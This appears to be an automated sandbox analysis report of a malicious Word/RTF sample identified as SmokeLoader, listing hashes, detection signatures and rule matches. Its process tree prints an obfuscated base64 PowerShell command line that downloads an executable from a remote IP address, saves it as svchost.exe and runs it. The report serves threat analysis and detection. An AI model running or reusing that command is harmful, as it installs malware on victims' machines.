Windows
Analysis Report
472.rtf.doc
Overview
General Information
Sample name: | 472.rtf.doc (renamed because original name is a hash value) |
Original sample name: | 472.rtf.doc |
Analysis ID: | 1446716 |
MD5: | 0bd1328012301d04bdc921acb321b820 |
SHA1: | 724612a3c88f187aa000efe4ff4e9e04c9553696 |
SHA256: | 7be9ef61632edc0f2fc6ad59d64ad69dbffbd05013a80ab1dfbb6bd8a6090b66 |
Tags: | doc, Dofoil, rtf, SmokeLoader |
Detection
SmokeLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
Yara detected SmokeLoader
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (process start blacklist hit)
Drops PE files with benign system names
Encrypted powershell cmdline option found
Machine Learning detection for sample
Powershell drops PE file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: System File Execution Location Anomaly
Suspicious command line found
Suspicious powershell command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Uncommon Svchost Parent Process
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w7x64
- WINWORD.EXE (PID: 1096, cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
- cmd.exe (PID: 1408, cmdline: cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;, MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
- timeout.exe (PID: 1900, cmdline: timeout 3, MD5: 68A0A50CCAD87E1EE1944410A96D066C)
- powershell.exe (PID: 1432, cmdline: Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;, MD5: A575A7610E5F003CC36DF39E07C4BA7D)
- powershell.exe (PID: 3084, cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JABXAGUAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAFUAcgBsACAAPQAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgA4ADQALgAwAC4AMQA3ADMALwBkAG8AdwBuAGwAbwBhAGQAXwAyADIALwBzAGUAcgB2AGUAcgAuAGUAeABlACcAOwAgACQAUAB0AGgAIAA9ACAAIgAkAGUAbgB2ADoAVABlAG0AcABcAHMAdgBjAGgAbwBzAHQALgBlAHgAZQAiADsAIAAkAFcAZQBiAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFUAcgBsACwAIAAkAFAAdABoACkAOwAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAUAB0AGgAOwA=, MD5: A575A7610E5F003CC36DF39E07C4BA7D)
- svchost.exe (PID: 3188, cmdline: "C:\Users\user\AppData\Local\Temp\svchost.exe", MD5: 92C57DD80B764A028749520017D44E76)
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
SmokeLoader | The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual download returns an HTTP 404 but still contains data in the response body. | | | |
No configs have been found.
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| Windows_Trojan_Smokeloader_3687686f | unknown | unknown | |
| Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown | |
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | |
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | |
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | |
System Summary
Source | Author |
---|---|
| Florian Roth (Nextron Systems) |
| Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) |
| Florian Roth (Nextron Systems) |
| pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t |
| Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community |